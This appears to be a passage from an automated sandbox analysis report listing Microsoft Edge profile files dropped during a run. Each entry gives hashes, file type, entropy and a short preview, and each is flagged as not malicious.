SSDEEP:	6:HUYmud+q2P923oH+TcwtpIFUt8YUYRUpZmw+YUYgVkwO923oH+Tcwta/WLJ:bHYv4YebmFUt8uRo/+u45LYebaUJ
MD5:	9B01E636641ABCC6512560A2CCAE45F0
SHA1:	8F0CD05F5762D8DD0406F1B674E4825903CF1AF2
SHA-256:	C405BDF9E0A2B20940978E99D9F63465092A5AB9326A9FACE984786318942FF1
SHA-512:	6681F311B8ECC270ED26B85239FF9B38A41DAF85A2AA1FB59E26F6298757857BB24083EBFE5B1BAA37948D28881E7C5DA365BB3EC36273C51EB580C6C5718DD2
Malicious:	false
Preview:	2024/11/11-18:06:17.124 1dd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/11-18:06:17.129 1dd8 Recovering log #3.2024/11/11-18:06:17.130 1dd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2645752257569107
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMNSAELyKOMq+8yC8F/YfU5m+OlTLVumC:Bq+n0JN9ELyKOMq+8y9/Ow9
MD5:	A65D52F515F3AB25E5D6B616A1423DA0
SHA1:	8AB14345301793FE70775A48853B4517C359CA67
SHA-256:	5CA6E93C22FA0CDA94CB9A7FAF5B79DCBF0A1E9222AF7EFEEDAE68E6B454B415
SHA-512:	FF07EB16D210508D81E2923AB17B0A6520E7BD58523A09188111DF78E7C93068AA71171C615826A7B69BDA6FFEE9B771320BA08E91D184401854F73DEE83839E
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.46658902316754636
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0C3lH:v7doKsKuKZKlZNmu46yjx0S
MD5:	9AAA47964069D1E07BB9E2627787FDBB
SHA1:	936AD13C6503886300EA1726DF61B0FECB559F10
SHA-256:	24621812F4A13F4F5ED5507BF2CD42EB73846817B4509320C45D2CB451A0462A
SHA-512:	2F35CC45F27071947669B864E945FF7103A6CAADC381ADF93FCF5E79DD92ADED1C3E15DE8BBFD1C8CFEB990E9A093BD63EB4EFF9167D8B20A5FDAFBF317CB5DC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a02f5016-f75e-4cc9-98b3-d99827188699.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.561718088681068
Encrypted:	false
SSDEEP:	768:5v2gG07pLGLppDWPNFf088F1+UoAYDCx9Tuqh0VfUC9xbog/OVkIZydvarwf7kIc:5v2gG4cppDWPNFf08u1jaJIZAvff7ku8
MD5:	BBF9EB840A2C696F3B9733B4A9F10B96
SHA1:	957776CA7628EB3DB86323DF70D2F485FF35DBBE
SHA-256:	11D5C490AA3612C3525866B41A5A3082516F4C7B2DE1551E3D641DA7BFBBF91D
SHA-512:	60CAD04B204B1F579FEA685BA58E94EDBC34E73A0BA549DFB27B4D97CE2D017D4B8FB1B7C6FCA8631D86531E7B37932FA08EB72DF87E2AEB8F4E3A974220AA55
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375839977094074","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375839977094074","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\af14b284-5774-496d-a77a-50ef3bfef3a3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\efabddde-6c22-48b2-91cd-125d2d5fcea5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10436
Entropy (8bit):	5.133818676031041
Encrypted:	false
SSDEEP:	192:stVkdpLsTXsZihUkdgK9Tgu8ObV+FZpQw/m66WI5aFIMY/P8YJ:stVQLsTXfhFgwbGzQwb6WgaTYV
MD5:	886FB034B1C0CD188EA2FBE6512A3B13
SHA1:	78343648193579C0C5275EBAB48C53FB9B1FAA3C
SHA-256:	F46204FD6DE7B9C268E4DE8E1CE7D2A853CDEC0755D84359A25B28BF831564A5
SHA-512:	9D58FA120227B0D92D797D8ED64622FA0C7EE1D01A9647DA7EE741431D77B61B7A4B6997BB724C719D1D15340B646E68211392DC183DD97B189EA716CAF2ED4B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375839977532473","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10563347059646351
Encrypted:	false
SSDEEP:	12:JntbJfxMntbJfxnpEjVl/PnnnnnnnnnnnnvoQhEoZ:Jntb9xMntb9xpoPnnnnnnnnnnnnvLj
MD5:	D77A21FB3AD7A339CEDBD40A93D35AD3
SHA1:	6138C878E17A4B9136DAA12DB0C1D34A0FC7C533
SHA-256:	8C023838B840C12182220C45EE11425C863C08E65AA40D77E766276C8526E7DC
SHA-512:	5B93A57F251349448E6014333C25CC664A2B572CEF9F9FF7118DA8F92F58082DC2134B728141C66C921BE79D854A500F44AC3B8D30628D45D4BF7A38C8401E4C
Malicious:	false
Preview:	..-.............Q.......G]b...:.4..}....C.......-.............Q.......G]b...:.4..}....C.............M...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	333752
Entropy (8bit):	0.9292066415233264
Encrypted:	false
SSDEEP:	384:G2OjUw5v1b8CeQAfgDFOMRLb63U13iv8eyEyUHyyyo/LyBxyE73gv8B:s8An
MD5:	6DF33DF01D58F10DCAE5DE9B08A25FE5
SHA1:	B0A08853FC5F80C86F9AB8BDA6B1513911279A63
SHA-256:	E0D4A539217A694AB200445F96F63BA6D94141AE9F6B413375D384CF334A9A98
SHA-512:	AA2DBE350A697469F76CB26F501527EC6E8445C4D389824A6E0D1DD76D2094B57A1A06ABBB5D097F66A11854B1B2AC722BA388BB483D1EACFBC96E9882656EF3
Malicious:	false
Preview:	7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	628
Entropy (8bit):	3.233510772321519
Encrypted:	false
SSDEEP:	12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuuoO8mV:iDNV
MD5:	DBDE0B32B1CD818C98DA0A0E04F75CF3
SHA1:	996CA05B487C930C0A46FF7002B166DA19F81DF5
SHA-256:	0EF4F76C723B55609D73ABD303D9065CF1CA7D23D0EABA51A5F994BF0E9ADA72
SHA-512:	24E5B5D8B7FEA54DA8EF760E5F1C149EB7AF072174B96E2803BAFB53B3FF38900480D44BE674F1F60050935C3C915DB4AA253359942D10B272A04465A724789C
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............I..a0................39_config..........6.....n ...1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.242292201425411
Encrypted:	false
SSDEEP:	6:HUYEpQ+q2P923oH+TcwtfrK+IFUt8YUYEpdWZmw+YUYUKpQVkwO923oH+TcwtfrF:bEpQ+v4Yeb23FUt8uEpdW/+uRpQV5LYq
MD5:	AD8113E6D194254DC300F87098AB8422
SHA1:	B89C9DFE1BC863D0EB9C4F5B8DE9313D0F3A64D4
SHA-256:	05178BC382D48E900CAE9B5FB6E032DDB18C6DFA2F729C00BF0A5EEA46998B5E
SHA-512:	0566E0DD491F4638BFC5F4D478999F6FDF82135D2A2C930C043543AE2136DFC65A0677053FC0B6577E5A23694A698690FD058959763B5526FBF737EF7B56AC38
Malicious:	false
Preview:	2024/11/11-18:06:17.578 19cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/11-18:06:17.578 19cc Recovering log #3.2024/11/11-18:06:17.579 19cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.242292201425411
Encrypted:	false
SSDEEP:	6:HUYEpQ+q2P923oH+TcwtfrK+IFUt8YUYEpdWZmw+YUYUKpQVkwO923oH+TcwtfrF:bEpQ+v4Yeb23FUt8uEpdW/+uRpQV5LYq
MD5:	AD8113E6D194254DC300F87098AB8422
SHA1:	B89C9DFE1BC863D0EB9C4F5B8DE9313D0F3A64D4
SHA-256:	05178BC382D48E900CAE9B5FB6E032DDB18C6DFA2F729C00BF0A5EEA46998B5E
SHA-512:	0566E0DD491F4638BFC5F4D478999F6FDF82135D2A2C930C043543AE2136DFC65A0677053FC0B6577E5A23694A698690FD058959763B5526FBF737EF7B56AC38
Malicious:	false
Preview:	2024/11/11-18:06:17.578 19cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/11-18:06:17.578 19cc Recovering log #3.2024/11/11-18:06:17.579 19cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.059252238767438
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
MD5:	D8D8899761F621B63AD5ED6DF46D22FE
SHA1:	23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
SHA-256:	A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
SHA-512:	4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.215865720531664
Encrypted:	false
SSDEEP:	6:HUYcQQ+q2P923oH+TcwtfrzAdIFUt8YUYSpdWZmw+YUYSpQVkwO923oH+Tcwtfrm:brQ+v4Yeb9FUt8uSpdW/+uSpQV5LYebS
MD5:	9A2DF7CF2CA04264CD1EF686F25AEF92
SHA1:	2C18242E3DECAE9C6523C6EDCCB2CA235CF16086
SHA-256:	4C413842D27DCEC9DDD000EBAAB982FAD5E888FC3276CAFACB0AF031C2AF2752
SHA-512:	A7BB720E35E9C50BAC9801E4D064AE89C5DB175DCB871FC0992DA7E92938B7B7C3B7FBBA60EE682A5D5C262A149FCE34099610ED7E18E1153830902772A6AB26
Malicious:	false
Preview:	2024/11/11-18:06:17.571 19cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/11-18:06:17.572 19cc Recovering log #3.2024/11/11-18:06:17.572 19cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.215865720531664
Encrypted:	false
SSDEEP:	6:HUYcQQ+q2P923oH+TcwtfrzAdIFUt8YUYSpdWZmw+YUYSpQVkwO923oH+Tcwtfrm:brQ+v4Yeb9FUt8uSpdW/+uSpQV5LYebS
MD5:	9A2DF7CF2CA04264CD1EF686F25AEF92
SHA1:	2C18242E3DECAE9C6523C6EDCCB2CA235CF16086
SHA-256:	4C413842D27DCEC9DDD000EBAAB982FAD5E888FC3276CAFACB0AF031C2AF2752
SHA-512:	A7BB720E35E9C50BAC9801E4D064AE89C5DB175DCB871FC0992DA7E92938B7B7C3B7FBBA60EE682A5D5C262A149FCE34099610ED7E18E1153830902772A6AB26
Malicious:	false
Preview:	2024/11/11-18:06:17.571 19cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/11-18:06:17.572 19cc Recovering log #3.2024/11/11-18:06:17.572 19cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090751155399332
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6Ctbz8hu3VlXr4CRo1
MD5:	A1977BAA568D2180A3BD8A41892C5415
SHA1:	6102BB8DFD443569978B6DFE39A38CC440F136DC
SHA-256:	A2542EDC69EB6A86827734223BE25A3FF07B2C19923382B40F939D205FB72713
SHA-512:	90E7EE6ADEDF5325E0479008C960D3320C945CDD2E818A6CFF56BC88BA993F1E82F1E378AE4522322959562FDAFA41892AA22E28DE2103F8CFEDD17C617D5A6C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3590e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090751155399332
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6Ctbz8hu3VlXr4CRo1
MD5:	A1977BAA568D2180A3BD8A41892C5415
SHA1:	6102BB8DFD443569978B6DFE39A38CC440F136DC
SHA-256:	A2542EDC69EB6A86827734223BE25A3FF07B2C19923382B40F939D205FB72713
SHA-512:	90E7EE6ADEDF5325E0479008C960D3320C945CDD2E818A6CFF56BC88BA993F1E82F1E378AE4522322959562FDAFA41892AA22E28DE2103F8CFEDD17C617D5A6C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3592d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090751155399332
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6Ctbz8hu3VlXr4CRo1
MD5:	A1977BAA568D2180A3BD8A41892C5415
SHA1:	6102BB8DFD443569978B6DFE39A38CC440F136DC
SHA-256:	A2542EDC69EB6A86827734223BE25A3FF07B2C19923382B40F939D205FB72713
SHA-512:	90E7EE6ADEDF5325E0479008C960D3320C945CDD2E818A6CFF56BC88BA993F1E82F1E378AE4522322959562FDAFA41892AA22E28DE2103F8CFEDD17C617D5A6C
Malicious:	false
